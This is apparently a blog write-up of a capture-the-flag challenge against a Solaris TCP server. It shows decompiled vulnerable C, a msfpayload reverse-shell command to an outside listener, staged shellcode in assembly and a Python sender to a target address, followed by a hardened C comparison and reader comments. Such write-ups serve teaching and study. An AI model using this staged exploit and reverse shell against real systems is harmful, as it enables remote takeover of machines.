This challenge was on remote exploiting. The binary is for SunOS (Solaris).
Summary: shellcoding challenge
The program is a simple forking tcp server with the following client callback function:
int __cdecl client_callback(int fd)
{
    int n;
    char buf[4];
    void (*shellcode)(void); // [sp+18h] [bp-20h]@1
    ...
    shellcode = buf + 1;
    n = read_bytes(fd, buf, 73);
    printf("read %d bytes\n\n\n", n);
    shellcode();
    return 0;
}
OK, we have 72 bytes for shellcode. Let’s look at Metasploit’s shell_reverse_tcp payload:
$ msfpayload solaris/x86/shell_reverse_tcp LHOST=1.3.3.7 \
    LPORT=3123 R>payload
$ wc payload
 0  3 91 payload
Ohhh, 91 bytes. Too many… We need staged shellcode. Let’s write a small first stage that reads another shellcode and executes it. A good thing is that we can get the socket descriptor from the stack: it’s the first argument to client_callback, so it’s at [ebp+8]. Also we can reuse the binary’s own read_bytes(...) function:
use32
mov esi, ebp             ; place for shellcode
push 0x7f                ; len
push esi                 ; buffer
push dword [ebp + 8]     ; socket fd
call far ptr 0x08051104  ; read_bytes
call esi                 ; call shellcode
Assemble it with fasm and send it to the server:
import socket
import time

SC1 = open("sh.bin").read().rjust(73, "\x90")  # stage 1, NOP-padded to the 73 bytes the server reads
SC2 = open("payload").read()                    # stage 2: the 91-byte msfpayload reverse shell
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect(("140.197.212.184", 5555))
f.send(SC1)
time.sleep(1)
f.send(SC2)
Then catch a shell with a listening netcat and get the key.
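The whole exploit hinges on the callback reading 73 bytes into a 4-byte buffer and then calling into it. As an added example (not the challenge binary's code), here is that shape next to a bounded, data-only version, with a pipe standing in for the client socket; the semantics of read_bytes are assumed (read up to len bytes, return the count).

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Stand-in for the binary's read_bytes(fd, buf, len): read up to len
 * bytes and return how many arrived (assumed semantics, not the real code). */
ssize_t read_bytes(int fd, char *buf, size_t len)
{
    size_t got = 0;
    while (got < len) {
        ssize_t r = read(fd, buf + got, len - got);
        if (r <= 0) break;
        got += (size_t)r;
    }
    return (ssize_t)got;
}

/* The challenge's shape: 4-byte buffer, 73-byte read, jump into the
 * buffer. Kept for comparison only; nothing here calls it. */
int vulnerable_callback(int fd)
{
    char buf[4];
    void (*shellcode)(void) = (void (*)(void))(buf + 1);
    read_bytes(fd, buf, 73);  /* writes 69 bytes past the end of buf */
    shellcode();              /* runs whatever the client sent */
    return 0;
}

/* Hardened shape: the read is capped by the buffer's size and the
 * bytes are only ever treated as data. Returns the count accepted. */
#define MAX_MSG 72
ssize_t hardened_callback(int fd)
{
    char buf[MAX_MSG + 1];
    ssize_t n = read_bytes(fd, buf, MAX_MSG);
    buf[n] = '\0';            /* n <= MAX_MSG, so this stays in bounds */
    return n;
}

/* Pushes a constructed 73-byte message through a pipe: the hardened
 * callback takes 72 bytes and leaves the 73rd unread. Returns 72 on
 * success, -1 otherwise. */
ssize_t demo_bounded_read(void)
{
    int p[2];
    char msg[73], rest;
    memset(msg, 'A', sizeof msg);
    if (pipe(p) != 0 || write(p[1], msg, sizeof msg) != (ssize_t)sizeof msg) return -1;
    close(p[1]);
    ssize_t n = hardened_callback(p[0]);
    ssize_t left = read(p[0], &rest, 1);
    close(p[0]);
    return (n == MAX_MSG && left == 1) ? n : -1;
}
```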
The flag: wh0thefuck_USES_solarisanyway?!
4 comments
Hi,
Thanks for the walkthrough, I’ve just got one question… how do you reverse a binary to C code?
Author
IDA with hexrays :) And then renaming and retyping vars and funcs with guessing/analyzing
Thanks for your response, gotta get myself a copy. Cheers
@hellman you damn pirate! :D